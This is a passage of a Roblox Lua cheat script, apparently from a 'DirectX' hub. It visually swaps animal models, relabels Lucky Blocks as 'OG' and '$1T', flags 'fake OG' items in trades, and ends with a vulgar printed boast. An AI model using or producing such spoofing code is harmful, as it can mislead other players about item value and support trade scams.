obj:IsA("TextButton") then             obj:GetPropertyChangedSignal("Text"):Connect(function()                 task.defer(function()                     if obj and obj.Parent then patch(obj) end                 end)             end)         end     end) end)  local fakeOGNames = {} for original in pairs(swaps) do     local dn = Animals[original] and Animals[original].DisplayName or original     fakeOGNames[dn] = true end  local warnedTrades = {}  local function showTradeWarning(animalName)     if warnedTrades[animalName] then return end     warnedTrades[animalName] = true      local warnGui = Instance.new("ScreenGui")     warnGui.Name = "DirectXTradeWarn"     warnGui.ResetOnSpawn = false     warnGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling     warnGui.Parent = gui      local wFrame = Instance.new("Frame")     wFrame.Size = UDim2.new(0, 320, 0, 72)     wFrame.Position = UDim2.new(1, 10, 0.7, 0)     wFrame.BackgroundColor3 = Color3.fromRGB(8, 8, 8)     wFrame.BackgroundTransparency = 0.05     wFrame.BorderSizePixel = 0     wFrame.ClipsDescendants = true     wFrame.Parent = warnGui     Instance.new("UICorner", wFrame).CornerRadius = UDim.new(0, 12)      local wStroke = Instance.new("UIStroke")     wStroke.Color = Color3.fromRGB(255, 255, 255)     wStroke.Thickness = 1     wStroke.Transparency = 0.75     wStroke.Parent = wFrame      local wTopLine = Instance.new("Frame")     wTopLine.Size = UDim2.new(1, 0, 0, 1)     wTopLine.Position = UDim2.new(0, 0, 0, 0)     wTopLine.BackgroundColor3 = Color3.fromRGB(255, 255, 255)     wTopLine.BackgroundTransparency = 0.2     wTopLine.BorderSizePixel = 0     wTopLine.ZIndex = 3     wTopLine.Parent = wFrame     local wTopGrad = Instance.new("UIGradient", wTopLine)     wTopGrad.Transparency = NumberSequence.new({         NumberSequenceKeypoint.new(0, 1),         NumberSequenceKeypoint.new(0.2, 0.2),         NumberSequenceKeypoint.new(0.5, 0),         NumberSequenceKeypoint.new(0.8, 0.2),         NumberSequenceKeypoint.new(1, 1),     })      local wAccent = Instance.new("Frame")     wAccent.Size = UDim2.new(0, 3, 1, -12)     wAccent.Position = UDim2.new(0, 6, 0, 6)     wAccent.BackgroundColor3 = Color3.fromRGB(200, 60, 60)     wAccent.BackgroundTransparency = 0.4     wAccent.BorderSizePixel = 0     wAccent.ZIndex = 2     wAccent.Parent = wFrame     Instance.new("UICorner", wAccent).CornerRadius = UDim.new(0, 2)     task.spawn(function()         while wFrame and wFrame.Parent do             TweenService:Create(wAccent, TweenInfo.new(0.8, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), {BackgroundTransparency = 0.1}):Play()             task.wait(0.8)             TweenService:Create(wAccent, TweenInfo.new(0.8, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), {BackgroundTransparency = 0.6}):Play()             task.wait(0.8)         end     end)      local wIcon = Instance.new("TextLabel")     wIcon.Size = UDim2.new(0, 34, 0, 34)     wIcon.Position = UDim2.new(0, 16, 0.5, -17)     wIcon.BackgroundColor3 = Color3.fromRGB(20, 20, 20)     wIcon.BorderSizePixel = 0     wIcon.Text = "⚠"     wIcon.TextColor3 = Color3.fromRGB(255, 255, 255)     wIcon.TextScaled = true     wIcon.Font = Enum.Font.GothamBlack     wIcon.ZIndex = 3     wIcon.Parent = wFrame     Instance.new("UICorner", wIcon).CornerRadius = UDim.new(0, 8)     local wIconStroke = Instance.new("UIStroke")     wIconStroke.Color = Color3.fromRGB(200, 60, 60)     wIconStroke.Thickness = 1     wIconStroke.Transparency = 0.5     wIconStroke.Parent = wIcon     task.spawn(function()         while wIcon and wIcon.Parent do             TweenService:Create(wIconStroke, TweenInfo.new(0.6, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), {Transparency = 0.2}):Play()             task.wait(0.6)             TweenService:Create(wIconStroke, TweenInfo.new(0.6, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), {Transparency = 0.7}):Play()             task.wait(0.6)         end     end)      local wLabel = Instance.new("TextLabel")     wLabel.Size = UDim2.new(1, -66, 0, 16)     wLabel.Position = UDim2.new(0, 58, 0, 10)     wLabel.BackgroundTransparency = 1     wLabel.Text = "WARNING — FAKE OG IN TRADE"     wLabel.TextColor3 = Color3.fromRGB(255, 255, 255)     wLabel.Font = Enum.Font.GothamBlack     wLabel.TextSize = 10     wLabel.TextXAlignment = Enum.TextXAlignment.Left     wLabel.ZIndex = 3     wLabel.Parent = wFrame      local wSub = Instance.new("TextLabel")     wSub.Size = UDim2.new(1, -66, 0, 14)     wSub.Position = UDim2.new(0, 58, 0, 28)     wSub.BackgroundTransparency = 1     wSub.Text = animalName .. " may not be real!"     wSub.TextColor3 = Color3.fromRGB(140, 140, 140)     wSub.Font = Enum.Font.GothamMedium     wSub.TextSize = 10     wSub.TextXAlignment = Enum.TextXAlignment.Left     wSub.ZIndex = 3     wSub.Parent = wFrame      local wBrand = Instance.new("TextLabel")     wBrand.Size = UDim2.new(0, 60, 0, 10)     wBrand.Position = UDim2.new(0, 58, 1, -16)     wBrand.BackgroundTransparency = 1     wBrand.Text = ".gg/directxhub"     wBrand.TextColor3 = Color3.fromRGB(0, 0, 0)     wBrand.Font = Enum.Font.Gotham     wBrand.TextSize = 11     wBrand.TextXAlignment = Enum.TextXAlignment.Left     wBrand.ZIndex = 3     wBrand.Parent = wFrame      task.spawn(function()         while wFrame and wFrame.Parent do             TweenService:Create(wTopGrad, TweenInfo.new(1.5, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), {Offset = Vector2.new(0.3, 0)}):Play()             task.wait(1.5)             TweenService:Create(wTopGrad, TweenInfo.new(1.5, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), {Offset = Vector2.new(-0.3, 0)}):Play()             task.wait(1.5)         end     end)      TweenService:Create(wFrame, TweenInfo.new(0.5, Enum.EasingStyle.Quint, Enum.EasingDirection.Out), {Position = UDim2.new(1, -330, 0.7, 0)}):Play()     task.delay(5, function()         TweenService:Create(wFrame, TweenInfo.new(0.4, Enum.EasingStyle.Quint, Enum.EasingDirection.In), {Position = UDim2.new(1, 10, 0.7, 0)}):Play()         task.delay(0.4, function()             warnGui:Destroy()             warnedTrades[animalName] = nil         end)     end) end  task.spawn(function()     local tradeLiveTrade = gui:WaitForChild("TradeLiveTrade", 30)     if not tradeLiveTrade then return end     local tradeUI = tradeLiveTrade:WaitForChild("TradeLiveTrade", 30)     if not tradeUI then return end     local otherSide = tradeUI:WaitForChild("Other", 30)     if not otherSide then return end     local scrolling = otherSide:WaitForChild("ScrollingFrame", 30)     if not scrolling then return end     local function checkItem(obj)         if not obj:IsA("TextLabel") then return end         task.defer(function()             if not obj or not obj.Parent then return end             for fakeName in pairs(fakeOGNames) do                 if obj.Text:find(fakeName, 1, true) then                     showTradeWarning(fakeName)                     break                 end             end         end)     end     scrolling.DescendantAdded:Connect(checkItem)     for _, obj in scrolling:GetDescendants() do checkItem(obj) end end)  -- ═══════════════════════════════════════════════════════ -- VISUAL SWAP IN WORKSPACE (FIXED — saves traits from plot) -- ══════════════  ════════════════════════════════════════  local models  = RS.Models.Animals local anims   = RS.Animations.Animals local swapped = {} local CLONE_TAG = "DirectXClone" local savedTraits = {} local savedMuts   = {}  local function isVFX(d)     return d:IsA("ParticleEmitter") or d:IsA("Trail") or d:IsA("Beam")         or d:IsA("PointLight") or d:IsA("SpotLight") or d:IsA("SurfaceLight") end  local function hide(obj)     for _, p in ipairs(obj:GetDescendants()) do         if p:IsA("BasePart") then             p.Transparency = 1             p.Size = Vector3.new(0.001, 0.001, 0.001)         elseif p:IsA("Decal") or p:IsA("Texture") or p:IsA("SpecialMesh") then             p.Transparency = 1         elseif isVFX(p) then             p:Destroy()         end     end     obj.DescendantAdded:Connect(function(d)         task.defer(function()             if not d or not d.Parent then return end             if d:IsA("BasePart") then                 d.Transparency = 1                 d.Size = Vector3.new(0.001, 0.001, 0.001)             elseif d:IsA("Decal") or d:IsA("Texture") or d:IsA("SpecialMesh") then                 d.Transparency = 1             elseif isVFX(d) then                 pcall(function() d:Destroy() end)             end         end)     end) end  workspace.DescendantAdded:Connect(function(obj)     if not obj:IsA("Model") or swapped[obj] or not swaps[obj.Name] then return end     if obj:HasTag(CLONE_TAG) then return end      local originalName = obj.Name     local rep = swaps[originalName]     swapped[obj] = true      task.spawn(function()         local mut = obj:GetAttribute("Mutation") or obj:GetAttribute("__mutation")         local traits = obj:GetAttribute("Traits")         local parentPath = obj.Parent and obj.Parent:GetFullName() or ""         local isOnPlot = string.find(parentPath, "Plots")          -- Save traits/mutation when on plot         if isOnPlot then             if traits and traits ~= "" then                 savedTraits[originalName] = traits             end             if mut then                 savedMuts[originalName] = mut             end         end          -- Use saved data when picked up (no traits/mut on model)         if not isOnPlot then             if not traits or traits == "" then                 traits = savedTraits[originalName]             end             if not mut then                 mut = savedMuts[originalName]             end         end          hide(obj)          local template = models:FindFirstChild(rep)         if not template then swapped[obj] = nil return end          local clone = template:Clone()         clone.Name = originalName         clone:AddTag(CLONE_TAG)         clone:PivotTo(obj:GetPivot())          -- Copy ALL attributes from original to clone         for attr, value in pairs(obj:GetAttributes()) do             clone:SetAttribute(attr, value)         end          clone.Parent = obj.Parent          local mutCleanup, traitCleanup = nil, nil          -- Apply mutation         if mut then             local ok, err = pcall(function()                 mutCleanup = SharedAnimals:ApplyMutation(clone, rep, mut)             end)             if not ok or not mutCleanup then                 pcall(function()                     mutCleanup = SharedAnimals:ApplyMutation(clone, originalName, mut)                 end)             end         end          -- Apply traits         if traits and traits ~= "" then             local ok, err = pcall(function()                 local traitsTable = {}                 for trait in string.gmatch(traits, "[^,]+") do                     table.insert(traitsTable, trait)                 end                 traitCleanup = SharedAnimals:ApplyTraits(clone, rep, traitsTable)             end)             if not ok or not traitCleanup then                 pcall(function()                     local traitsTable = {}                     for trait in string.gmatch(traits, "[^,]+") do                         table.insert(traitsTable, trait)                     end                     traitCleanup = SharedAnimals:ApplyTraits(clone, originalName, traitsTable)                 end)             end         end          -- Listen for late attribute changes         local attrConn = obj.AttributeChanged:Connect(function(attr)             if clone and clone.Parent then                 clone:SetAttribute(attr, obj:GetAttribute(attr))             end             if (attr == "Mutation" or attr == "__mutation") and not mutCleanup then                 local lateMut = obj:GetAttribute(attr)                 if lateMut then                     pcall(function()                         mutCleanup = SharedAnimals:ApplyMutation(clone, rep, lateMut)                     end)                 end             end             if attr == "Traits" and not traitCleanup then                 local lateTraits = obj:GetAttribute(attr)                 if lateTraits and lateTraits ~= "" then                     pcall(function()                         local traitsTable = {}                         for trait in string.gmatch(lateTraits, "[^,]+") do                             table.insert(traitsTable, trait)                         end                         traitCleanup = SharedAnimals:ApplyTraits(clone, rep, traitsTable)                     end)                 end             end         end)          local att = obj:FindFirstChild("OVERHEAD_ATTACHMENT", true)         if att then att.CFrame = CFrame.new(0, heights[rep] or 8, 0) end          local elapsed = 0         while obj and obj.Parent and not obj.PrimaryPart do             task.wait(0.05)             elapsed += 0.05             if elapsed >= 3 then break end         end          if not obj or not obj.Parent then clone:Destroy() return end          local cp, op = clone.PrimaryPart, obj.PrimaryPart         if cp and op then             cp.Anchored = false             cp.Massless = true             cp.CanCollide = false             cp.CanQuery = false             cp.CanTouch = false             local w = Instance.new("WeldConstraint")             w.Part0, w.Part1, w.Parent = cp, op, cp         end          local af = anims:FindFirstChild(rep)         if af then             local ac = clone:FindFirstChildOfClass("AnimationController") or Instance.new("AnimationController", clone)             local an = ac:FindFirstChildOfClass("Animator") or Instance.new("Animator", ac)             local idle = af:FindFirstChild("Idle")             if idle then                 local track = an:LoadAnimation(idle)                 track.Looped = true                 track:Play()                 track:AdjustSpeed(idle:GetAttribute("Speed") or 1)                 local stop = AnimSync:Add(track)                 obj.Destroying:Connect(function()                     stop(); track:Stop(0); track:Destroy()                 end)             end         end          obj.Destroying:Connect(function()             if attrConn then pcall(function() attrConn:Disconnect() end) end             if mutCleanup then pcall(mutCleanup) end             if traitCleanup then pcall(traitCleanup) end             swapped[obj] = nil             clone:Destroy()         end)     end) end)  -- ═══════════════════════════════════════════════════════ -- LUCKY BLOCK MODIFIER -- ═══════════════════════════════════════════════════════  local debris = workspace.Debris  local function check(obj)     local isLucky = false      for i, v in pairs(obj:GetDescendants()) do         if (v:IsA("TextLabel") or v:IsA("TextButton")) and v.Text:find("Lucky Block") then             isLucky = true             break         end     end      if not isLucky then return end      for i, v in pairs(obj:GetDescendants()) do         if v:IsA("TextLabel") and v.Name == "Rarity" then             v.Text = "OG"             v.TextColor3 = Color3.fromRGB(255, 215, 0)             v.TextStrokeColor3 = Color3.fromRGB(0, 0, 0)             v.TextStrokeTransparency = 0             v.BackgroundTransparency = 1         end          if v:IsA("TextLabel") and (v.Name == "Cost" or v.Name == "Price") then             v.Text = "$1T"             v.TextColor3 = Color3.fromRGB(144, 238, 0)             v.TextStrokeColor3 = Color3.fromRGB(0, 0, 0)             v.TextStrokeTransparency = 0             v.BackgroundTransparency = 1         end     end end  for i, v in pairs(debris:GetChildren()) do     if v.Name == "FastOverheadTemplate" then         check(v)     end end  debris.ChildAdded:Connect(function(v)     if v.Name == "FastOverheadTemplate" then         task.wait()         check(v)     end end)  print("DirectX On Top Pussy!")
end)
